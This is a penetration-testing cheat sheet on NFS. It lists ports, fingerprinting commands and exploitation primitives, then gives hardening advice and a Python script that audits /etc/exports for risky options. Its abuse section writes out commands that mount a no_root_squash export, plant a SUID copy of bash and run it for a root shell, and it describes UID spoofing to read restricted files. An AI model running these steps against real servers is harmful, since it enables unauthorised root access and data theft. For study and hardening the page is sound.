NFS
aka Network File System, nfsd
Network File System on 2049. Exports are often world-mountable, and a no_root_squash export lets you plant a root-owned SUID binary that runs as root on the target.
Ports
| Port | Proto | Notes |
|---|---|---|
| 111 | tcp | rpcbind / portmapper |
| 2049 | tcp | NFS |
Fingerprint
- showmount -e lists the exported shares
- rpcinfo shows nfs/mountd registered
Key files
| Path | Holds | Sensitive |
|---|---|---|
| /etc/exports | export list and options (look for no_root_squash, rw) | sensitive |
Exploitation primitives
- showmount -e then mount the export to read/loot files
- no_root_squash: as local root, drop a SUID-root binary onto the share, then execute it on the target for root
- UID spoofing: create a local user matching the file owner's UID to access restricted files
Overview
NFS on 2049 shares directories over the network. The privesc classic is a no_root_squash export: files you create as root locally keep root ownership on the server, so a SUID binary becomes a root shell.
Enumeration and abuse
List exports:
showmount -e <TARGET>
Mount an export:
mkdir /mnt/nfs && mount -t nfs <TARGET>:/export /mnt/nfs -o nolock
With no_root_squash, as local root, drop a SUID bash:
cp /bin/bash /mnt/nfs/rootbash && chmod +s /mnt/nfs/rootbash
On the target, run it:
/export/rootbash -p
Hardening
Use root_squash, export read-only where possible, and restrict exports to specific hosts.
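To check a server against this hardening advice, the following added example (not part of the original page) audits text in /etc/exports syntax and flags no_root_squash, rw, and entries open to any host. The sample hosts and paths are constructed, and it assumes export paths contain no spaces and that option lists are not split across continuation lines.

```python
import re

# Constructed sample in /etc/exports syntax (hosts and paths are made up).
SAMPLE_EXPORTS = """\
/srv/backup   *(rw,sync,no_root_squash)
/srv/public   192.0.2.0/24(ro,root_squash)
/srv/home     build01.example.internal(rw,sync)
# stray space: 192.0.2.10 gets defaults, everyone else gets the options
/srv/scratch  192.0.2.10 (rw,no_root_squash)
/srv/media    -ro,all_squash 192.0.2.20 *.example.internal(rw)
"""

CLIENT_RE = re.compile(r"^([^()\s]*)(?:\(([^)]*)\))?$")

def effective(opts, on, off):
    """True if `on` is the last of the pair on/off to appear (default: off)."""
    for opt in reversed(opts):
        if opt in (on, off):
            return opt == on
    return False

def audit_exports(text):
    """Return sorted (path, client, issue) tuples for risky export entries."""
    findings = set()
    for line in text.replace("\\\n", " ").splitlines():  # join continuations
        line = line.split("#", 1)[0].strip()             # drop comments
        if not line:
            continue
        path, *specs = line.split()
        defaults = []
        for spec in specs or [""]:      # no client list means every host
            if spec.startswith("-"):    # "-opt,opt": defaults for later clients
                defaults = spec[1:].split(",")
                continue
            match = CLIENT_RE.match(spec)
            if not match:
                continue
            client = match.group(1) or "*"   # empty client matches any host
            opts = defaults + (match.group(2) or "").split(",")
            if effective(opts, "no_root_squash", "root_squash"):
                findings.add((path, client, "no_root_squash"))
            if effective(opts, "rw", "ro"):
                findings.add((path, client, "rw"))
            if client == "*":
                findings.add((path, client, "any-host"))
    return sorted(findings)

if __name__ == "__main__":
    for path, client, issue in audit_exports(SAMPLE_EXPORTS):
        print(f"{path:14} {client:22} {issue}")
```

The /srv/scratch line shows why the parser treats a bare "(options)" token as its own client: the space after the host makes the options apply to every host instead of the one named.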